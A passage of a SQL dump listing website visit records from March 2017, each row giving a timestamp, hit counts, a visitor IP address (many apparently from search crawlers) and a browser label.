ther'),(95524,1490339008,1,1,0,0,'91.196.178.33','chrome'),(95525,1490339010,1,1,0,0,'78.111.190.32','firefox'),(95526,1490340694,1,1,0,0,'163.172.64.187','other'),(95527,1490341047,1,1,0,0,'163.172.68.128','other'),(95528,1490341063,1,1,0,0,'91.196.178.65','chrome'),(95529,1490341363,1,1,0,0,'91.217.66.22','chrome'),(95530,1490341546,1,1,0,0,'91.196.177.46','firefox'),(95531,1490342042,1,1,0,0,'141.8.142.15','other'),(95532,1490342183,1,1,0,0,'91.196.178.72','chrome'),(95533,1490342299,1,1,0,0,'164.132.161.79','other'),(95534,1490342439,1,1,0,0,'8.29.198.25','other'),(95535,1490342493,1,1,0,0,'157.55.39.246','other'),(95536,1490343093,1,0,1,0,'66.249.64.143',''),(95537,1490343354,1,1,0,0,'163.172.64.235','other'),(95538,1490343950,1,1,0,0,'180.76.15.158','other'),(95539,1490343990,1,1,0,0,'91.196.178.72','firefox'),(95540,1490344025,1,1,0,0,'163.172.108.151','chrome'),(95541,1490344320,1,1,0,0,'163.172.64.181','other'),(95542,1490344369,1,1,0,0,'82.207.91.234','firefox'),(95543,1490346043,3,3,0,0,'91.209.11.236','other'),(95544,1490346502,1,1,0,0,'37.54.125.207','chrome'),(95545,1490346678,1,0,1,0,'66.249.64.27',''),(95546,1490347134,1,1,0,0,'91.196.179.134','chrome'),(95547,1490347623,1,1,0,0,'91.196.177.15','chrome'),(95548,1490348055,1,0,1,0,'66.249.64.27',''),(95549,1490348366,1,1,0,0,'37.54.22.245','chrome'),(95550,1490348411,1,1,0,0,'180.76.15.8','other'),(95551,1490348484,2,2,0,0,'91.196.178.72','chrome'),(95552,1490348693,1,1,0,0,'91.196.177.46','firefox'),(95553,1490349079,1,1,0,0,'157.55.39.245','other'),(95554,1490349169,1,1,0,0,'91.196.178.40','firefox'),(95555,1490349718,2,2,0,0,'91.196.178.162','chrome'),(95556,1490349729,1,0,1,0,'66.249.64.133',''),(95557,1490350412,1,1,0,0,'95.108.179.15','other'),(95558,1490350433,1,0,1,0,'66.249.64.21',''),(95559,1490350715,1,1,0,0,'141.8.142.164','other'),(95560,1490350776,1,1,0,0,'141.8.142.154','other'),(95561,1490351049,1,1,0,0,'93.158.152.79','other'),(95562,1490351135,1,1,0,0,'91.196.178.33','chrome'),(95563,1490351224,1,1,0,0,'141.8.142.38','other'),(95564,1490351269,1,0,1,0,'66.249.64.24',''),(95565,1490351760,1,1,0,0,'66.249.64.27','chrome'),(95566,1490351802,2,1,1,0,'66.249.64.133',''),(95567,1490352448,1,1,0,0,'78.111.185.4','chrome'),(95568,1490353075,2,2,0,0,'192.163.246.104','other'),(95569,1490353273,1,1,0,0,'8.29.198.26','other'),(95570,1490353385,1,1,0,0,'91.196.177.46','firefox'),(95571,1490354113,1,1,0,0,'95.132.21.247','chrome'),(95572,1490354122,1,1,0,0,'95.108.213.34','other'),(95573,1490354528,1,0,1,0,'66.249.64.27',''),(95574,1490356574,1,1,0,0,'52.86.176.3','other'),(95575,1490357140,1,1,0,0,'157.55.39.245','other'),(95576,1490357287,1,0,1,0,'66.249.64.138',''),(95577,1490357354,1,1,0,0,'91.196.178.68','firefox'),(95578,1490357447,1,1,0,0,'91.124.44.222','opera'),(95579,1490358237,1,1,0,0,'51.255.65.46','other'),(95580,1490358328,1,1,0,0,'207.46.13.59','other'),(95581,1490358340,1,1,0,0,'91.209.11.236','other'),(95582,1490358756,1,1,0,0,'91.196.178.129','firefox'),(95583,1490359061,2,2,0,0,'188.162.64.65','chrome'),(95584,1490359703,1,0,1,0,'66.249.64.24',''),(95585,1490359837,1,1,0,0,'91.209.11.236','other'),(95586,1490360130,1,1,0,0,'91.196.178.67','chrome'),(95587,1490360667,1,0,1,0,'66.249.64.133',''),(95588,1490360729,1,1,0,0,'95.134.220.125','chrome'),(95589,1490360939,1,1,0,0,'46.201.51.16','chrome'),(95590,1490360976,1,1,0,0,'157.55.39.245','other'),(95591,1490361344,1,1,0,0,'91.209.11.236','other'),(95592,1490362147,2,2,0,0,'88.198.55.175','other'),(95593,1490362274,1,0,1,0,'66.249.64.27',''),(95594,1490362509,2,2,0,0,'91.196.178.70','firefox'),(95595,1490362580,1,1,0,0,'91.196.178.167','chrome'),(95596,1490362687,1,1,0,0,'95.108.213.34','other'),(95597,1490362937,1,1,0,0,'51.255.65.67','other'),(95598,1490363241,1,1,0,0,'91.196.178.169','firefox'),(95599,1490363360,1,1,0,0,'82.207.126.218','chrome'),(95600,1490363418,1,1,0,0,'91.196.178.70','firefox'),(95601,1490363578,1,1,0,0,'66.249.64.24','chrome'),(95602,1490363973,1,0,1,0,'66.249.64.133',''),(95603,1490364109,1,1,0,0,'8.29.198.26','other'),(95604,1490364751,2,2,0,0,'164.132.161.23','other'),(95605,1490365062,1,1,0,0,'193.194.127.217','firefox'),(95606,1490365091,1,1,0,0,'91.209.11.236','other'),(95607,1490365148,1,1,0,0,'163.172.68.136','other'),(95608,1490365511,1,1,0,0,'37.73.221.177','other'),(95609,1490365720,1,0,1,0,'66.249.64.133',''),(95610,1490365897,1,1,0,0,'164.132.161.70','other'),(95611,1490366192,1,1,0,0,'51.255.65.40','other'),(95612,1490366209,1,1,0,0,'91.209.11.236','other'),(95613,1490366348,1,0,1,0,'66.249.64.138',''),(95614,1490366898,1,1,0,0,'207.46.13.59','other'),(95615,1490367644,1,1,0,0,'164.132.161.16','other'),(95616,1490367876,1,1,0,0,'37.52.16.229','firefox'),(95617,1490368012,1,1,0,0,'91.196.178.39','chrome'),(95618,1490368463,1,1,0,0,'51.255.65.85','other'),(95619,1490369061,1,1,0,0,'192.163.246.104','other'),(95620,1490369224,1,1,0,0,'163.172.64.188','other'),(95621,1490369252,1,1,0,0,'164.132.161.19','other'),(95622,1490369512,1,1,0,0,'164.132.161.44','other'),(95623,1490369525,1,0,1,0,'66.249.64.21',''),(95624,1490369674,1,1,0,0,'164.132.161.71','other'),(95625,1490370290,1,1,0,0,'164.132.161.42','other'),(95626,1490370387,1,1,0,0,'164.132.161.76','other'),(95627,1490370464,1,1,0,0,'164.132.161.47','other'),(95628,1490370648,1,1,0,0,'188.163.16.165','chrome'),(95629,1490372351,1,1,0,0,'157.55.39.246','other'),(95630,1490372383,1,1,0,0,'95.108.213.34','other'),(95631,1490373043,1,1,0,0,'163.172.64.251','other'),(95632,1490374220,1,1,0,0,'163.172.64.232','other'),(95633,1490374803,1,1,0,0,'91.209.11.236','other'),(95634,1490374943,1,1,0,0,'8.29.198.25','other'),(95635,1490374948,4,4,0,0,'94.154.239.69','other'),(95636,1490375582,1,1,0,0,'37.52.115.154','chrome'),(95637,1490375824,1,1,0,0,'141.8.142.154','other'),(95638,1490375933,1,1,0,0,'164.132.161.82','other'),(95639,1490376828,1,1,0,0,'163.172.72.48','other'),(95640,1490377652,1,1,0,0,'95.108.213.34','other'),(95641,1490380360,1,1,0,0,'164.132.161.35','other'),(95642,1490380506,1,1,0,0,'164.132.161.73','other'),(95643,1490381858,1,0,1,0,'66.249.64.24',''),(95644,1490382349,1,1,0,0,'163.172.69.178','other'),(95645,1490382389,1,1,0,0,'157.55.39.246','other'),(95646,1490383330,1,1,0,0,'51.255.65.75','other'),(95647,1490383477,1,1,0,0,'164.132.161.14','other'),(95648,1490383639,1,0,1,0,'66.249.64.187',''),(95649,1490383656,1,0,1,0,'66.249.64.61',''),(95650,1490383920,1,1,0,0,'164.132.161.77','other'),(95651,1490384462,2,2,0,0,'95.108.213.34','other'),(95652,1490384649,1,1,0,0,'95.133.238.250','chrome'),(95653,1490384758,1,1,0,0,'51.255.65.15','other'),(95654,1490384769,1,1,0,0,'46.202.119.186','chrome'),(95655,1490385775,1,1,0,0,'8.29.198.26','other'),(95656,1490387023,1,1,0,0,'51.255.65.71','other'),(95657,1490387687,1,1,0,0,'66.102.9.35','chrome'),(95658,1490387835,1,1,0,0,'51.255.65.97','other'),(95659,1490389404,1,1,0,0,'164.132.161.37','other'),(95660,1490390820,1,1,0,0,'164.132.161.33','other'),(95661,1490390968,1,1,0,0,'51.255.65.91','other'),(95662,1490391636,1,1,0,0,'51.255.65.17','other'),(95663,1490393364,1,1,0,0,'40.77.167.4','other'),(95664,1490394640,1,1,0,0,'66.249.64.79','chrome'),(95665,1490395849,1,1,0,0,'163.172.64.242','other'),(95666,1490396010,1,1,0,0,'51.255.65.62','other'),(95667,1490396602,1,1,0,0,'8.29.198.27','other'),(95668,1490396855,1,1,0,0,'163.172.64.247','other'),(95669,1490398046,1,1,0,0,'164.132.161.83','other'),(95670,1490398634,1,1,0,0,'109.63.157.53','msie'),(95671,1490398640,1,0,1,0,'157.55.39.245',''),(95672,1490399112,1,1,0,0,'51.255.65.83','other'),(95673,1490399341,1,1,0,0,'176.195.199.59','msie'),(95674,1490399345,1,1,0,0,'163.172.64.184','other'),(95675,1490399350,1,1,0,0,'51.255.65.43','other'),(95676,1490403377,1,1,0,0,'51.255.65.80','other'),(95677,1490403596,1,0,1,0,'66.249.64.24',''),(95678,1490404410,1,1,0,0,'37.204.105.120','msie'),(95679,1490404828,1,0,1,0,'66.249.64.24',''),(95680,1490407434,1,1,0,0,'8.29.198.26','other'),(95681,1490409041,1,1,0,0,'163.172.64.234','other'),(95682,1490410985,1,1,0,0,'51.255.65.75','other'),(95683,1490411405,1,1,0,0,'51.255.65.80','other'),(95684,1490411656,1,1,0,0,'93.80.147.188','msie'),(95685,1490411962,1,1,0,0,'164.132.161.10','other'),(95686,1490412534,1,1,0,0,'66.249.64.21','chrome'),(95687,1490412543,1,1,0,0,'66.249.64.79','chrome'),(95688,1490412779,1,1,0,0,'180.76.15.136','other'),(95689,1490413026,1,1,0,0,'109.63.225.253','msie'),(95690,1490414161,1,1,0,0,'95.108.213.7','other'),(95691,1490414174,1,1,0,0,'141.8.142.15','other'),(95692,1490414208,1,1,0,0,'95.108.179.15','other'),(95693,1490414298,1,1,0,0,'141.8.142.154','other'),(95694,1490414982,1,1,0,0,'164.132.161.77','other'),(95695,1490416170,1,0,1,0,'66.249.64.24',''),(95696,1490417265,1,1,0,0,'130.180.211.164','chrome'),(95697,1490417447,1,0,1,0,'66.249.64.74',''),(95698,1490417692,1,1,0,0,'141.8.142.15','other'),(95699,1490417908,1,0,1,0,'66.249.64.21',''),(95700,1490418263,1,1,0,0,'8.29.198.26','other'),(95701,1490418828,1,1,0,0,'51.255.65.6','other'),(95702,1490419225,1,1,0,0,'164.132.161.33','other'),(95703,1490419353,1,1,0,0,'180.76.15.135','other'),(95704,1490419598,1,1,0,0,'141.8.142.15','other'),(95705,1490419610,1,1,0,0,'141.8.142.154','other'),(95706,1490420681,1,0,1,0,'66.249.64.24',''),(95707,1490421884,1,1,0,0,'163.172.64.220','other'),(95708,1490422132,1,1,0,0,'164.132.161.39','other'),(95709,1490422430,1,1,0,0,'51.255.65.62','other'),(95710,1490423381,1,1,0,0,'51.255.65.90','other'),(95711,1490423896,1,1,0,0,'91.196.178.65','chrome'),(95712,1490424092,2,2,0,0,'95.213.141.126','opera'),(95713,1490424523,1,1,0,0,'164.132.161.59','other'),(95714,1490424652,1,1,0,0,'66.249.64.74','chrome'),(95715,1490424952,1,0,1,0,'66.249.64.24',''),(95716,1490425070,1,1,0,0,'66.249.93.156','chrome'),(95717,1490425325,1,1,0,0,'51.255.65.18','other'),(95718,1490426144,1,1,0,0,'51.255.65.41','other'),(95719,1490427397,1,0,1,0,'66.249.64.79',''),(95720,1490428020,1,1,0,0,'163.172.64.250','other'),(95721,1490428034,1,1,0,0,'5.166.144.33','msie'),(95722,1490429098,1,1,0,0,'8.29.198.26','other'),(95723,1490430683,1,0,1,0,'66.249.64.69',''),(95724,1490430755,1,1,0,0,'164.132.161.34','other'),(95725,1490430773,1,1,0,0,'164.132.161.81','other'),(95726,1490431413,1,1,0,0,'5.255.253.63','other'),(95727,1490431431,1,0,1,0,'157.55.39.246',''),(95728,1490431974,1,1,0,0,'40.77.167.4','other'),(95729,1490432996,3,3,0,0,'62.210.251.247','other'),(95730,1490433612,1,0,1,0,'66.249.64.21',''),(95731,1490433921,1,0,1,0,'66.249.64.79',''),(95732,1490434145,2,0,2,0,'66.249.64.27',''),(95733,1490434789,1,1,0,0,'178.154.189.3','other'),(95734,1490435927,1,1,0,0,'164.132.161.45','other'),(95735,1490436177,1,1,0,0,'51.255.65.86','other'),(95736,1490436543,1,1,0,0,'40.77.167.17','other'),(95737,1490437844,1,0,1,0,'66.249.64.74',''),(95738,1490439867,1,1,0,0,'163.172.68.123','other'),(95739,1490439922,1,1,0,0,'8.29.198.25','other'),(95740,1490439982,1,1,0,0,'90.154.76.97','msie'),(95741,1490440049,1,1,0,0,'180.76.15.143','other'),(95742,1490440307,1,1,0,0,'51.255.65.32','other'),(95743,1490440887,1,1,0,0,'157.55.39.246','other'),(95744,1490441566,1,1,0,0,'95.108.179.15','other'),(95745,1490441569,1,1,0,0,'95.108.213.34','other'),(95746,1490442641,1,1,0,0,'163.172.64.242','other'),(95747,1490443029,1,1,0,0,'176.195.118.145','msie'),(95748,1490443064,1,1,0,0,'51.255.65.91','other'),(95749,1490443347,1,1,0,0,'51.255.65.67','other'),(95750,1490443441,1,1,0,0,'176.195.99.248','msie'),(95751,1490443644,1,1,0,0,'178.154.149.3','other'),(95752,1490444200,1,1,0,0,'176.195.119.188','msie'),(95753,1490444322,1,1,0,0,'51.255.65.59','other'),(95754,1490445150,1,1,0,0,'164.132.161.17','other'),(95755,1490446035,1,1,0,0,'157.55.39.246','other'),(95756,1490446102,1,1,0,0,'51.255.65.64','other'),(95757,1490446476,1,0,1,0,'66.249.64.74',''),(95758,1490447507,1,1,0,0,'91.196.178.100','chrome'),(95759,1490448355,1,1,0,0,'178.92.84.231','firefox'),(95760,1490448977,1,1,0,0,'180.76.15.155','other'),(95761,1490449012,1,1,0,0,'163.172.71.21','other'),(95762,1490449275,2,2,0,0,'52.86.176.3','other'),(95763,1490450219,1,0,1,0,'66.249.64.21',''),(95764,1490450753,1,1,0,0,'8.29.198.27','other'),(95765,1490450835,1,1,0,0,'93.158.152.77','other'),(95766,1490450907,1,1,0,0,'81.30.164.218','chrome'),(95767,1490452013,1,1,0,0,'163.172.64.216','other'),(95768,1490452792,1,0,1,0,'66.249.64.74',''),(95769,1490453383,1,1,0,0,'51.255.65.9','other'),(95770,1490453392,1,1,0,0,'66.249.64.24','chrome'),(95771,1490454135,1,1,0,0,'163.172.108.151','chrome'),(95772,1490454151,1,1,0,0,'81.30.164.218','chrome'),(95773,1490454484,2,2,0,0,'195.43.70.252','chrome'),(95774,1490454509,1,1,0,0,'164.132.161.16','other'),(95775,1490454717,1,1,0,0,'95.132.35.211','chrome'),(95776,1490454795,1,1,0,0,'164.132.161.42','other'),(95777,1490456475,1,1,0,0,'51.255.65.63','other'),(95778,1490457425,1,1,0,0,'207.46.13.59','other'),(95779,1490458818,1,1,0,0,'40.77.167.17','other'),(95780,1490459116,1,1,0,0,'144.76.12.99','other'),(95781,1490460141,2,0,2,0,'66.249.64.74',''),(95782,1490460163,1,1,0,0,'180.76.15.16','other'),(95783,1490460588,1,1,0,0,'164.132.161.36','other'),(95784,1490461424,2,2,0,0,'52.86.176.3','other'),(95785,1490461465,1,1,0,0,'180.76.15.152','other'),(95786,1490461611,1,1,0,0,'8.29.198.26','other'),(95787,1490461818,1,1,0,0,'51.255.65.39','other'),(95788,1490462900,1,1,0,0,'164.132.161.28','other'),(95789,1490463013,1,1,0,0,'149.56.204.245','chrome'),(95790,1490463567,1,1,0,0,'66.249.64.79','chrome'),(95791,1490464187,1,1,0,0,'51.255.65.67','other'),(95792,1490464625,1,0,1,0,'66.249.64.69',''),(95793,1490465028,1,1,0,0,'91.196.178.34','other'),(95794,1490465032,1,0,1,0,'66.249.64.27',''),(95795,1490465879,1,1,0,0,'69.60.242.136','firefox'),(95796,1490466858,1,1,0,0,'157.55.39.246','other'),(95797,1490467594,1,1,0,0,'66.249.64.24','chrome'),(95798,1490467926,1,1,0,0,'157.55.39.246','other'),(95799,1490468541,1,1,0,0,'51.255.65.2','other'),(95800,1490468577,1,0,1,0,'66.249.64.79',''),(95801,1490469077,1,0,1,0,'40.77.167.65',''),(95802,1490470628,1,1,0,0,'91.209.11.236','other'),(95803,1490471149,1,1,0,0,'40.77.167.17','other'),(95804,1490471170,1,1,0,0,'95.108.213.34','other'),(95805,1490472249,1,0,1,0,'66.249.64.21',''),(95806,1490472442,1,1,0,0,'8.29.198.26','other'),(95807,1490474032,1,1,0,0,'51.255.65.97','other'),(95808,1490474337,1,1,0,0,'164.132.161.66','other'),(95809,1490474679,1,1,0,0,'66.249.64.74','chrome'),(95810,1490474779,1,1,0,0,'163.172.64.245','other'),(95811,1490474857,1,1,0,0,'109.87.240.154','other'),(95812,1490475745,1,1,0,0,'163.172.64.179','other'),(95813,1490475989,1,1,0,0,'66.249.64.27','chrome'),(95814,1490476596,1,1,0,0,'163.172.108.151','chrome'),(95815,1490476811,1,1,0,0,'164.132.161.15','other'),(95816,1490477299,1,1,0,0,'51.255.65.33','other'),(95817,1490477406,1,0,1,0,'66.249.64.21',''),(95818,1490478341,1,1,0,0,'40.77.167.17','other'),(95819,1490478362,3,3,0,0,'91.209.11.236','other'),(95820,1490478440,1,1,0,0,'141.8.142.154','other'),(95821,1490478444,1,1,0,0,'141.8.142.15','other'),(95822,1490479189,1,1,0,0,'163.172.68.136','other'),(95823,1490479193,1,1,0,0,'51.255.65.59','other'),(95824,1490479946,1,1,0,0,'164.132.161.21','other'),(95825,1490482243,1,1,0,0,'95.108.213.34','other'),(95826,1490483275,1,1,0,0,'8.29.198.26','other'),(95827,1490483716,1,1,0,0,'141.8.142.15','other'),(95828,1490483747,1,1,0,0,'5.255.253.28','other'),(95829,1490484293,1,1,0,0,'66.249.64.74','chrome'),(95830,1490484336,1,1,0,0,'66.249.64.27','chrome'),(95831,1490484529,1,1,0,0,'51.255.65.67','other'),(95832,1490485192,1,1,0,0,'164.132.161.8','other'),(95833,1490486702,1,1,0,0,'51.255.65.80','other'),(95834,1490487600,1,1,0,0,'51.255.65.46','other'),(95835,1490488701,1,0,1,0,'66.249.64.79',''),(95836,1490488922,1,0,1,0,'66.249.64.74',''),(95837,1490490082,1,1,0,0,'5.248.164.61','firefox'),(95838,1490490208,1,1,0,0,'164.132.161.79','other'),(95839,1490490822,1,1,0,0,'141.8.142.38','other'),(95840,1490490860,1,0,1,0,'66.249.64.79',''),(95841,1490492003,1,1,0,0,'37.147.99.232','chrome'),(95842,1490494098,1,1,0,0,'8.29.198.27','other'),(95843,1490494212,1,0,1,0,'66.249.64.24',''),(95844,1490494436,303,303,0,0,'31.131.251.70','msie'),(95845,1490494452,1,1,0,0,'198.245.49.215','other'),(95846,1490495340,244,244,0,0,'31.131.251.70','msie'),(95847,1490495689,1,1,0,0,'164.132.161.35','other'),(95848,1490496115,1,1,0,0,'95.108.213.34','other'),(95849,1490496678,1,1,0,0,'164.132.161.24','other'),(95850,1490497204,7,7,0,0,'208.43.225.84','other'),(95851,1490497220,1,1,0,0,'208.43.225.85','other'),(95852,1490499464,1,1,0,0,'178.154.200.45','other'),(95853,1490500530,1,1,0,0,'163.172.64.217','other'),(95854,1490500543,1,1,0,0,'93.158.152.79','other'),(95855,1490500596,1,1,0,0,'51.255.65.33','other'),(95856,1490501476,1,0,1,0,'66.249.64.27',''),(95857,1490501604,1,1,0,0,'66.249.64.79','chrome'),(95858,1490502443,1,0,1,0,'66.249.64.21',''),(95859,1490502606,1,1,0,0,'95.108.179.15','other'),(95860,1490502617,1,1,0,0,'141.8.142.15','other'),(95861,1490503635,1,1,0,0,'91.196.178.40','chrome'),(95862,1490503812,1,1,0,0,'164.132.161.37','other'),(95863,1490504021,1,1,0,0,'5.164.115.67','chrome'),(95864,1490504183,1,1,0,0,'94.180.214.27','firefox'),(95865,1490504931,1,1,0,0,'8.29.198.26','other'),(95866,1490505034,1,1,0,0,'5.255.253.4','other'),(95867,1490505258,1,0,1,0,'66.249.64.69',''),(95868,1490505563,1,1,0,0,'91.196.178.71','chrome'),(95869,1490507504,1,1,0,0,'163.172.64.239','other'),(95870,1490508447,1,1,0,0,'164.132.161.39','other'),(95871,1490508858,1,1,0,0,'157.55.39.207','other'),(95872,1490508983,1,1,0,0,'66.249.93.156','chrome'),(95873,1490509267,1,1,0,0,'164.132.161.93','other'),(95874,1490509367,1,0,1,0,'66.249.64.69',''),(95875,1490509610,1,1,0,0,'51.255.65.37','other'),(95876,1490510303,1,1,0,0,'52.86.176.3','other'),(95877,1490512024,1,1,0,0,'146.120.30.38','chrome'),(95878,1490512612,1,0,1,0,'66.249.64.74',''),(95879,1490512725,1,1,0,0,'163.172.64.193','other'),(95880,1490512876,1,1,0,0,'52.86.176.3','other'),(95881,1490513034,1,1,0,0,'51.255.65.28','other'),(95882,1490513728,1,1,0,0,'157.55.39.75','other'),(95883,1490513807,1,1,0,0,'178.92.84.231','firefox'),(95884,1490513932,1,1,0,0,'40.77.167.65','other'),(95885,1490515760,1,1,0,0,'8.29.198.27','other'),(95886,1490516166,1,0,1,0,'66.249.64.24',''),(95887,1490517925,2,2,0,0,'95.108.213.34','other'),(95888,1490519070,1,1,0,0,'163.172.64.224','other'),(95889,1490520789,1,1,0,0,'157.55.39.75','other'),(95890,1490521313,1,1,0,0,'52.86.176.3','other'),(95891,1490522376,1,1,0,0,'163.172.64.238','other'),(95892,1490522452,1,1,0,0,'164.132.161.51','other'),(95893,1490524312,1,1,0,0,'66.249.64.21','chrome'),(95894,1490525303,1,0,1,0,'66.249.64.21',''),(95895,1490525346,1,0,1,0,'66.249.64.74',''),(95896,1490525912,1,0,1,0,'40.77.167.65',''),(95897,1490526604,1,1,0,0,'8.29.198.25','other'),(95898,1490527464,1,1,0,0,'107.178.195.220','msie'),(95899,1490527465,1,1,0,0,'204.13.201.139','msie'),(95900,1490527507,1,1,0,0,'51.255.65.52','other'),(95901,1490527580,1,1,0,0,'91.196.178.39','chrome'),(95902,1490527734,3,3,0,0,'163.172.138.81','firefox'),(95903,1490527756,1,1,0,0,'139.59.149.99','msie'),(95904,1490527761,1,1,0,0,'163.172.138.81','msie'),(95905,1490527782,1,1,0,0,'163.172.138.81','other'),(95906,1490528182,1,1,0,0,'164.132.161.49','other'),(95907,1490528591,1,1,0,0,'163.172.68.128','other'),(95908,1490528869,1,1,0,0,'164.132.161.40','other'),(95909,1490528976,1,1,0,0,'66.249.64.79','chrome'),(95910,1490529127,1,0,1,0,'66.249.64.21',''),(95911,1490529149,1,1,0,0,'66.249.64.74','chrome'),(95912,1490529964,1,1,0,0,'164.132.161.27','other'),(95913,1490530455,1,1,0,0,'141.8.142.15','other'),(95914,1490531159,1,1,0,0,'78.111.185.37','chrome'),(95915,1490531252,1,1,0,0,'163.172.64.177','other'),(95916,1490531316,1,0,1,0,'40.77.167.17',''),(95917,1490531807,1,1,0,0,'51.255.65.6','other'),(95918,1490532043,1,1,0,0,'164.132.161.63','other'),(95919,1490533302,1,0,1,0,'66.249.64.69',''),(95920,1490533911,1,1,0,0,'84.177.15.131','msie'),(95921,1490534459,1,1,0,0,'163.172.64.224','other'),(95922,1490536877,1,1,0,0,'91.196.178.66','firefox'),(95923,1490537134,1,0,1,0,'66.249.64.21',''),(95924,1490537444,1,1,0,0,'8.29.198.26','other'),(95925,1490538514,1,1,0,0,'51.255.65.23','other'),(95926,1490538584,1,0,1,0,'66.249.64.27',''),(95927,1490540494,1,1,0,0,'66.249.64.27','chrome'),(95928,1490540603,1,1,0,0,'66.249.64.79','chrome'),(95929,1490543121,1,1,0,0,'51.255.65.48','other'),(95930,1490543421,1,1,0,0,'193.194.127.202','chrome'),(95931,1490543463,1,1,0,0,'141.8.142.15','other'),(95932,1490544157,1,0,1,0,'40.77.167.65',''),(95933,1490544246,1,1,0,0,'180.76.15.161','other'),(95934,1490544977,1,0,1,0,'66.249.64.21',''),(95935,1490544991,1,0,1,0,'66.249.64.69',''),(95936,1490545916,1,1,0,0,'207.46.13.76','other'),(95937,1490546090,1,1,0,0,'66.102.9.40','chrome'),(95938,1490546145,1,0,1,0,'66.249.64.79',''),(95939,1490546754,1,1,0,0,'51.255.65.67','other'),(95940,1490548163,1,1,0,0,'164.132.161.55','other'),(95941,1490548274,1,1,0,0,'8.29.198.27','other'),(95942,1490548841,1,0,1,0,'66.249.64.69',''),(95943,1490550826,4,4,0,0,'157.55.39.207','other'),(95944,1490551055,1,0,1,0,'66.249.64.24',''),(95945,1490552760,1,1,0,0,'164.132.161.77','other'),(95946,1490553392,2,0,2,0,'66.249.64.69',''),(95947,1490554114,1,0,1,0,'66.249.64.21',''),(95948,1490554332,1,1,0,0,'163.172.64.236','other'),(95949,1490554642,1,1,0,0,'164.132.161.78','other'),(95950,1490557022,1,0,1,0,'66.249.65.62',''),(95951,1490557105,2,2,0,0,'94.154.239.69','other'),(95952,1490557210,1,1,0,0,'163.172.64.231','other'),(95953,1490558364,1,1,0,0,'141.8.142.154','other'),(95954,1490558770,1,0,1,0,'66.249.65.177',''),(95955,1490559107,1,1,0,0,'8.29.198.25','other'),(95956,1490559293,1,0,1,0,'66.249.65.61',''),(95957,1490563844,1,0,1,0,'66.249.65.60',''),(95958,1490563878,1,1,0,0,'164.132.161.73','other'),(95959,1490565233,2,0,2,0,'66.249.65.177',''),(95960,1490567115,1,1,0,0,'51.255.65.80','other'),(95961,1490568034,1,1,0,0,'51.255.65.15','other'),(95962,1490568383,1,0,1,0,'66.249.65.183',''),(95963,1490569264,1,1,0,0,'164.132.161.77','other'),(95964,1490569559,2,2,0,0,'157.55.39.207','other'),(95965,1490569864,1,1,0,0,'93.158.152.42','other'),(95966,1490569943,1,1,0,0,'8.29.198.25','other'),(95967,1490570112,1,0,1,0,'66.249.65.177',''),(95968,1490570303,1,1,0,0,'5.255.253.81','other'),(95969,1490570311,1,1,0,0,'217.69.133.2','other'),(95970,1490571006,1,1,0,0,'164.132.161.57','other'),(95971,1490571837,1,0,1,0,'66.249.65.180',''),(95972,1490572145,1,1,0,0,'164.132.161.58','other'),(95973,1490572190,1,0,1,0,'66.249.65.62',''),(95974,1490573678,1,1,0,0,'95.108.213.34','other'),(95975,1490574114,1,1,0,0,'157.55.39.207','other'),(95976,1490574764,1,1,0,0,'178.154.200.37','other'),(95977,1490575078,1,0,1,0,'66.249.65.177',''),(95978,1490579172,1,0,1,0,'66.249.65.60',''),(95979,1490580115,1,1,0,0,'51.255.65.28','other'),(95980,1490580450,1,1,0,0,'51.255.65.85','other'),(95981,1490580779,1,1,0,0,'8.29.198.26','other'),(95982,1490581311,1,0,1,0,'66.249.65.62',''),(95983,1490581477,1,1,0,0,'180.76.15.12','other'),(95984,1490582072,1,0,1,0,'66.249.65.60',''),(95985,1490583185,1,0,1,0,'66.249.65.60',''),(95986,1490588987,1,0,1,0,'66.249.65.60',''),(95987,1490589282,1,1,0,0,'91.196.178.72','firefox'),(95988,1490589800,1,1,0,0,'66.249.65.60','chrome'),(95989,1490589802,1,1,0,0,'66.249.65.183','chrome'),(95990,1490590778,1,0,1,0,'66.249.65.62',''),(95991,1490590809,1,1,0,0,'91.209.11.236','other'),(95992,1490591139,1,1,0,0,'164.132.161.63','other'),(95993,1490591323,1,1,0,0,'51.255.65.51','other'),(95994,1490591397,1,0,1,0,'66.249.65.183',''),(95995,1490591432,1,1,0,0,'164.132.161.84','other'),(95996,1490591614,1,1,0,0,'8.29.198.25','other'),(95997,1490591785,2,2,0,0,'91.196.178.68','firefox'),(95998,1490592897,1,1,0,0,'66.249.93.157','chrome'),(95999,1490592913,1,0,1,0,'66.249.65.61',''),(96000,1490593680,1,0,1,0,'66.249.65.180',''),(96001,1490595187,1,1,0,0,'91.196.178.72','firefox'),(96002,1490595226,1,0,1,0,'66.249.65.180',''),(96003,1490595276,1,1,0,0,'91.196.178.72','chrome'),(96004,1490595474,1,1,0,0,'64.246.187.42','firefox'),(96005,1490595801,1,1,0,0,'95.132.32.71','chrome'),(96006,1490597149,1,1,0,0,'66.249.65.183','chrome'),(96007,1490597163,2,2,0,0,'51.255.65.36','other'),(96008,1490598175,1,1,0,0,'91.209.11.236','other'),(96009,1490598818,1,1,0,0,'164.132.161.39','other'),(96010,1490599115,1,1,0,0,'37.53.231.237','chrome'),(96011,1490599307,1,0,1,0,'66.249.65.180',''),(96012,1490599688,1,1,0,0,'93.74.212.147','firefox'),(96013,1490599787,1,1,0,0,'92.112.184.137','firefox'),(96014,1490599811,1,1,0,0,'91.124.158.104','chrome'),(96015,1490599812,1,1,0,0,'5.255.253.54','other'),(96016,1490600248,1,0,1,0,'66.249.65.61',''),(96017,1490600371,1,1,0,0,'91.196.177.26','chrome'),(96018,1490600568,1,1,0,0,'51.255.65.70','other'),(96019,1490600609,1,1,0,0,'91.196.178.100','chrome'),(96020,1490600930,1,1,0,0,'51.255.65.89','other'),(96021,1490601078,1,1,0,0,'91.209.11.236','other'),(96022,1490601176,1,1,0,0,'51.255.65.42','other'),(96023,1490601473,2,2,0,0,'52.86.176.3','other'),(96024,1490601503,1,1,0,0,'91.196.177.46','chrome'),(96025,1490601723,1,1,0,0,'163.172.68.136','other'),(96026,1490602028,1,1,0,0,'5.83.16.134','chrome'),(96027,1490602127,1,0,1,0,'66.249.65.62',''),(96028,1490602219,2,2,0,0,'178.95.21.52','firefox'),(96029,1490602448,1,1,0,0,'8.29.198.26','other'),(96030,1490602467,1,1,0,0,'91.196.178.71','chrome'),(96031,1490602479,1,1,0,0,'141.8.142.50','other'),(96032,1490603083,1,1,0,0,'91.196.178.131','firefox'),(96033,1490603805,1,1,0,0,'164.132.161.41','other'),(96034,1490603871,1,0,1,0,'66.249.65.62',''),(96035,1490604198,1,1,0,0,'37.55.131.218','chrome'),(96036,14